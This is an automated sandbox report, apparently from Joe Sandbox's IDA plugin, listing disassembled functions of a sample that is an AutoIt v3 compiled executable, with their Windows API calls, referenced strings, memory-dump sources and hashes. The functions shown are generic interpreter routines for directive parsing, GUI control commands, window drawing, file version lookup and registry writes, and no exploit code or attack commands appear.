Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 78fb222641a0601f13be921227f8ba4b958d3101d99d7f51de0acf61ffa2c843
Instruction ID: 8d00e1686cafd3f37f158a5c645c493da4a7d61f6c63951a3c4b38945edae8db
Opcode Fuzzy Hash: 78fb222641a0601f13be921227f8ba4b958d3101d99d7f51de0acf61ffa2c843
Instruction Fuzzy Hash: 19518D30F48712ABC210EF14D982C69B7A3FFA4744B21482FF4479B391DA71D946DB86

Function 0062CC24 Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 267COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 0062CC68
__wcsnicmp.LIBCMT ref: 0062CC80
__wcsnicmp.LIBCMT ref: 0062CC98
__wcsnicmp.LIBCMT ref: 0062CCB0
__wcsnicmp.LIBCMT ref: 0062CCC8
__wcsnicmp.LIBCMT ref: 0062CCE0
__wcsnicmp.LIBCMT ref: 0062CCF8
__wcsnicmp.LIBCMT ref: 0062CD0C
__wcsnicmp.LIBCMT ref: 0062CD4D
__wcsnicmp.LIBCMT ref: 0062CD61
__wcsnicmp.LIBCMT ref: 0062CD75
__wcsnicmp.LIBCMT ref: 0062CD89

Strings

#ce, xrefs: 0062CD83
Cannot parse #include, xrefs: 00692FA1
#cs, xrefs: 0062CD06, 0062CD5B
Bad directive syntax error, xrefs: 00692ECB
#pragma compile, xrefs: 0062CC62
#comments-start, xrefs: 0062CCF2, 0062CD47
#OnAutoItStartRegister, xrefs: 0062CCAA
#include-once, xrefs: 0062CCC2
#requireadmin, xrefs: 0062CC92
Unterminated group of comments, xrefs: 00692FB4
#include, xrefs: 0062CCDA
#comments-end, xrefs: 0062CD6F
#notrayicon, xrefs: 0062CC7A

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 1038674560-86951937
Opcode ID: 68841200c8200e4ec7cc878610a1c42e74dca60ade6564b6bab795bedacfc313
Instruction ID: 447ea7192540180a807133e292d35b776bbbf77dfd3bd2e0b17274841ca72f0a
Opcode Fuzzy Hash: 68841200c8200e4ec7cc878610a1c42e74dca60ade6564b6bab795bedacfc313
Instruction Fuzzy Hash: 10812B70640626BBCF64AB64EC93FFF376BAF55310F04402DF9056A282EB61D941CB99

Function 0068C6E9 Relevance: 42.4, APIs: 23, Strings: 1, Instructions: 447windowCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 0068C788
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0068C83E
SendMessageW.USER32(?,00001102,00000002,?), ref: 0068C859
SendMessageW.USER32(?,000000F1,?,00000000), ref: 0068CB15

Strings

0, xrefs: 0068C89C

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: MessageSend$Window
String ID: 0
API String ID: 2326795674-4108050209
Opcode ID: 64805ead4310e1b3ccdd2b740560804a4db7706d7d96df879c552c19afa611b8
Instruction ID: 05dd598659e14961209f1f9c72c4a6a8f3d2cd4176aa4a6859dd0e90c3f2ada7
Opcode Fuzzy Hash: 64805ead4310e1b3ccdd2b740560804a4db7706d7d96df879c552c19afa611b8
Instruction Fuzzy Hash: A4F1E070104341AFE725AF24C885BAABBE6FF4A324F08072DF599963A1C774D845DFA1

Function 0068638D Relevance: 42.4, APIs: 1, Strings: 23, Instructions: 352COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,006BDC00), ref: 00686449

Strings

GETLINECOUNT, xrefs: 006866E4
TABRIGHT, xrefs: 006864BD
GETSELECTED, xrefs: 006866C1
GETLINE, xrefs: 0068678B
CURRENTTAB, xrefs: 006864DD
SENDCOMMANDID, xrefs: 006867CA
HIDEDROPDOWN, xrefs: 00686520
GETCURRENTLINE, xrefs: 00686704
SELECTSTRING, xrefs: 00686626
ISENABLED, xrefs: 0068648C
GETCURRENTSELECTION, xrefs: 00686603
TABLEFT, xrefs: 006864A7
UNCHECK, xrefs: 006866A1
ISCHECKED, xrefs: 00686659
CHECK, xrefs: 0068668B
SETCURRENTSELECTION, xrefs: 006865D6
ADDSTRING, xrefs: 00686536
SHOWDROPDOWN, xrefs: 00686500
DELSTRING, xrefs: 00686569
EDITPASTE, xrefs: 0068675B
ISVISIBLE, xrefs: 00686455
FINDSTRING, xrefs: 00686596
GETCURRENTCOL, xrefs: 00686724

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: BuffCharUpper
String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
API String ID: 3964851224-45149045
Opcode ID: c818fb0f51674ec799046c364a3ba95f388f34e5762eff940a1032e873fc8d1d
Instruction ID: 87cb7d525a150118443e007ea83e13b6c56943af8617d5f6ea3b9e70a11f2042
Opcode Fuzzy Hash: c818fb0f51674ec799046c364a3ba95f388f34e5762eff940a1032e873fc8d1d
Instruction Fuzzy Hash: DDC16B302042458BCB44FF10C551AAE77A7AF94344F04596DF8966B3E2EB31ED4BCB9A

Function 0068D575 Relevance: 39.2, APIs: 26, Instructions: 186windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 0068D5AE
SetTextColor.GDI32(?,?), ref: 0068D5B2
GetSysColorBrush.USER32(0000000F), ref: 0068D5C8
GetSysColor.USER32(0000000F), ref: 0068D5D3
CreateSolidBrush.GDI32(?), ref: 0068D5D8
GetSysColor.USER32(00000011), ref: 0068D5F0
CreatePen.GDI32(00000000,00000001,00743C00), ref: 0068D5FE
SelectObject.GDI32(?,00000000), ref: 0068D60F
SetBkColor.GDI32(?,00000000), ref: 0068D618
SelectObject.GDI32(?,?), ref: 0068D625
InflateRect.USER32(?,000000FF,000000FF), ref: 0068D644
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0068D65B
GetWindowLongW.USER32(00000000,000000F0), ref: 0068D670
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0068D698
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0068D6BF
InflateRect.USER32(?,000000FD,000000FD), ref: 0068D6DD
DrawFocusRect.USER32(?,?), ref: 0068D6E8
GetSysColor.USER32(00000011), ref: 0068D6F6
SetTextColor.GDI32(?,00000000), ref: 0068D6FE
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0068D712
SelectObject.GDI32(?,0068D2A5), ref: 0068D729
DeleteObject.GDI32(?), ref: 0068D734
SelectObject.GDI32(?,?), ref: 0068D73A
DeleteObject.GDI32(?), ref: 0068D73F
SetTextColor.GDI32(?,?), ref: 0068D745
SetBkColor.GDI32(?,?), ref: 0068D74F

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: 32e06d26a3d5e68fdac73fb9e3d0de535d91cef4eed8a8e26725e23048d06e1b
Instruction ID: c4f1d951e50d715365497b0e40eacc59ff6367b0c7d454472c2abe04a1230f36
Opcode Fuzzy Hash: 32e06d26a3d5e68fdac73fb9e3d0de535d91cef4eed8a8e26725e23048d06e1b
Instruction Fuzzy Hash: 56512C71900208BFDB10AFA4DC48EEEBB7AEB09324F105515F916AB2E1D775AA40DF60

Function 0068B6C4 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 400windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0068B7B0
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0068B7C1
CharNextW.USER32(0000014E), ref: 0068B7F0
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 0068B831
SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 0068B847
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0068B858
SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 0068B875
SetWindowTextW.USER32(?,0000014E), ref: 0068B8C7
SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 0068B8DD
SendMessageW.USER32(?,00001002,00000000,?), ref: 0068B90E
_memset.LIBCMT ref: 0068B933
SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 0068B97C
_memset.LIBCMT ref: 0068B9DB
SendMessageW.USER32 ref: 0068BA05
SendMessageW.USER32(?,00001074,?,00000001), ref: 0068BA5D
SendMessageW.USER32(?,0000133D,?,?), ref: 0068BB0A
InvalidateRect.USER32(?,00000000,00000001), ref: 0068BB2C
GetMenuItemInfoW.USER32(?), ref: 0068BB76
SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0068BBA3
DrawMenuBar.USER32(?), ref: 0068BBB2
SetWindowTextW.USER32(?,0000014E), ref: 0068BBDA

Strings

0, xrefs: 0068BB4F

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
String ID: 0
API String ID: 1073566785-4108050209
Opcode ID: 610cfce2d18a341260b8a21e37695c88f1b3ad1650715659b66f86836ed9ede2
Instruction ID: ca1553de6b0a59492b03b21cd55975f6c89ecd47d52b4f03bce4eda13f428ffa
Opcode Fuzzy Hash: 610cfce2d18a341260b8a21e37695c88f1b3ad1650715659b66f86836ed9ede2
Instruction Fuzzy Hash: F1E1C374900219AFDF20EF65CC84EEE7B7AFF05710F14925AF919AA290DB709A41DF60

Function 00622EC0 Relevance: 37.1, APIs: 8, Strings: 13, Instructions: 346COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00622F7A
IsWindow.USER32(?), ref: 006922FD

Strings

ACTIVE, xrefs: 006920CC
HANDLE, xrefs: 006920E2
REGEXPCLASS, xrefs: 00692149
H+m, xrefs: 00692184
REGEXPTITLE, xrefs: 006920F8
INSTANCE, xrefs: 0069223C
TITLE, xrefs: 00692292
LAST, xrefs: 006920B6
ALL, xrefs: 00692264
T+m, xrefs: 0069220E
CLASS, xrefs: 00692128
L+m, xrefs: 006921B2
P+m, xrefs: 006921E0

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: Window$Foreground
String ID: ACTIVE$ALL$CLASS$H+m$HANDLE$INSTANCE$L+m$LAST$P+m$REGEXPCLASS$REGEXPTITLE$T+m$TITLE
API String ID: 62970417-213249025
Opcode ID: 43e4070b8a11b7b8030bb4b0ff32edddda1cf2b6a4f3fc9bd0426a4d15922f0a
Instruction ID: b128e841a83312ba81a36f779284e98851a672cf067ad369359f9e8eadfe2aba
Opcode Fuzzy Hash: 43e4070b8a11b7b8030bb4b0ff32edddda1cf2b6a4f3fc9bd0426a4d15922f0a
Instruction Fuzzy Hash: C1D1F530504643BBCF44EF20D4A19EABBABBF64304F104A1DF45657AA1DB30E99ACF95

Function 0068764F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 0068778A
GetDesktopWindow.USER32 ref: 0068779F
GetWindowRect.USER32(00000000), ref: 006877A6
GetWindowLongW.USER32(?,000000F0), ref: 00687808
DestroyWindow.USER32(?), ref: 00687834
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 0068785D
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0068787B
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 006878A1
SendMessageW.USER32(?,00000421,?,?), ref: 006878B6
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 006878C9
IsWindowVisible.USER32(?), ref: 006878E9
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00687904
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00687918
GetWindowRect.USER32(?,?), ref: 00687930
MonitorFromPoint.USER32(?,?,00000002), ref: 00687956
GetMonitorInfoW.USER32 ref: 00687970
CopyRect.USER32(?,?), ref: 00687987
SendMessageW.USER32(?,00000412,00000000), ref: 006879F2

Strings

tooltips_class32, xrefs: 00687856
0, xrefs: 00687735
(, xrefs: 00687965

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: 8dde4e9266fc202ba502f86e2de4c103d77351dbfbbf526d2e01d55ce33ef17b
Instruction ID: d2c19579ae2a43c4e60fae7686a0e1f00d7f79db7d297db5583c1e05096f8272
Opcode Fuzzy Hash: 8dde4e9266fc202ba502f86e2de4c103d77351dbfbbf526d2e01d55ce33ef17b
Instruction Fuzzy Hash: 9EB1B171608301AFDB44EF64C848B5ABBE6FF89310F108A1DF59A9B291D770E805CFA5

Function 00666CE9 Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 178COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 00666CFB
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00666D21
_wcscpy.LIBCMT ref: 00666D4F
_wcscmp.LIBCMT ref: 00666D5A
_wcscat.LIBCMT ref: 00666D70
_wcsstr.LIBCMT ref: 00666D7B
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00666D97
_wcscat.LIBCMT ref: 00666DE0
_wcscat.LIBCMT ref: 00666DE7
_wcsncpy.LIBCMT ref: 00666E12

Strings

%u.%u.%u.%u, xrefs: 00666E75
\VarFileInfo\Translation, xrefs: 00666D8F
04090000, xrefs: 00666DCD
StringFileInfo\, xrefs: 00666D6A
DefaultLangCodepage, xrefs: 00666DFA

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 699586101-1459072770
Opcode ID: ca591c41f0e0d8c7f066c5ec7eaabcdaf7decbaa12184edc4ed18d880445bc7f
Instruction ID: 293b490d8afda67734e7590b9da3aabb7dd8231edad51a72b9b7796025c1a920
Opcode Fuzzy Hash: ca591c41f0e0d8c7f066c5ec7eaabcdaf7decbaa12184edc4ed18d880445bc7f
Instruction Fuzzy Hash: 1241D571A00211BBEB40AB64DD47EFF777EDF51710F140029FA05A6282EB75EA0196AA

Function 0063A856 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 285windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0063A939
GetSystemMetrics.USER32(00000007), ref: 0063A941
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0063A96C
GetSystemMetrics.USER32(00000008), ref: 0063A974
GetSystemMetrics.USER32(00000004), ref: 0063A999
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 0063A9B6
AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 0063A9C6
CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0063A9F9
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 0063AA0D
GetClientRect.USER32(00000000,000000FF), ref: 0063AA2B
GetStockObject.GDI32(00000011), ref: 0063AA47
SendMessageW.USER32(00000000,00000030,00000000), ref: 0063AA52

Part of subcall function 0063B63C: GetCursorPos.USER32(000000FF), ref: 0063B64F
Part of subcall function 0063B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0063B66C
Part of subcall function 0063B63C: GetAsyncKeyState.USER32(00000001), ref: 0063B691
Part of subcall function 0063B63C: GetAsyncKeyState.USER32(00000002), ref: 0063B69F

SetTimer.USER32(00000000,00000000,00000028,0063AB87), ref: 0063AA79

Strings

AutoIt v3 GUI, xrefs: 0063A9F1

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: 2ac2ba779c2b58dd803daa154c2433c71a3ba11260cb1fe4703f6d6972d6e21f
Instruction ID: d8c400c91c650a01039a569bae300ec21d41b20da2019fdee1cfecbe1916d532
Opcode Fuzzy Hash: 2ac2ba779c2b58dd803daa154c2433c71a3ba11260cb1fe4703f6d6972d6e21f
Instruction Fuzzy Hash: F6B17D71A0020A9FDB14DFA8CC45BED7BBAFB09314F115229FA56AB290DB34E841DF51

Function 00683639 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00683735
RegCreateKeyExW.ADVAPI32(?,?,00000000,006BDC00,00000000,?,00000000,?,?), ref: 006837A3
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 006837EB
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00683874
RegCloseKey.ADVAPI32(?), ref: 00683B94
RegCloseKey.ADVAPI32(00000000), ref: 00683BA1

Strings

REG_MULTI_SZ, xrefs: 0068395C
REG_QWORD, xrefs: 00683AE2
REG_DWORD, xrefs: 00683A65
REG_BINARY, xrefs: 00683B2F
REG_EXPAND_SZ, xrefs: 00683811
REG_SZ, xrefs: 006838B2

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: Close$ConnectCreateRegistryValue
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 536824911-966354055
Opcode ID: 1ac19bfb9e97a4334aafb228b5e4badba2dc9bf7c28dc2b50f812a1e79fb6ada
Instruction ID: 1f58e0a711a975b672af35b5be2d10dc72caebd360456e625010f8b203117986
Opcode Fuzzy Hash: 1ac19bfb9e97a4334aafb228b5e4badba2dc9bf7c28dc2b50f812a1e79fb6ada
Instruction Fuzzy Hash: 59026A75604A219FCB54EF14D851A2AB7E6FF88720F04855DF98A9B3A1CB30ED01CF99

Function 00686BC9 Relevance: 26.5, APIs: 2, Strings: 13, Instructions: 281windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00686C56
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00686D16

Strings

GETSELECTED, xrefs: 00686E3C
VIEWCHANGE, xrefs: 00686ECD
ISSELECTED, xrefs: 00686D21
FINDITEM, xrefs: 00686E81
GETSUBITEMCOUNT, xrefs: 00686CA1
SELECTALL, xrefs: 00686D75
SELECTCLEAR, xrefs: 00686D8D
SELECT, xrefs: 00686DA8
GETTEXT, xrefs: 00686CBF
GETITEMCOUNT, xrefs: 00686C84
SELECTINVERT, xrefs: 00686DDE
DESELECT, xrefs: 00686DFC
GETSELECTEDCOUNT, xrefs: 00686CF9

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 3974292440-719923060
Opcode ID: c7e16bbb2b26e20101a36dc6130cbfaff81bed45f6d59526726728811ce5ed0d
Instruction ID: a9eb141fa511ed32e94b33cc3cf75a773ba3e1eec70df4fe851ee3a4e11fe80f
Opcode Fuzzy Hash: c7e16bbb2b26e20101a36dc6130cbfaff81bed45f6d59526726728811ce5ed0d
Instruction Fuzzy Hash: 9AA19E702043419BCB54FF20D851A6AB3A3BF54350F105A6DB9A6AB3D2DF30ED0ACB95

Function 0065CF50 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 0065CF91
__swprintf.LIBCMT ref: 0065D032
_wcscmp.LIBCMT ref: 0065D045
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0065D09A
_wcscmp.LIBCMT ref: 0065D0D6
GetClassNameW.USER32(?,?,00000400), ref: 0065D10D
GetDlgCtrlID.USER32(?), ref: 0065D15F
GetWindowRect.USER32(?,?), ref: 0065D195
GetParent.USER32(?), ref: 0065D1B3
ScreenToClient.USER32(00000000), ref: 0065D1BA
GetClassNameW.USER32(?,?,00000100), ref: 0065D234
_wcscmp.LIBCMT ref: 0065D248
GetWindowTextW.USER32(?,?,00000400), ref: 0065D26E
_wcscmp.LIBCMT ref: 0065D282

Strings

%s%u, xrefs: 0065D02C

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
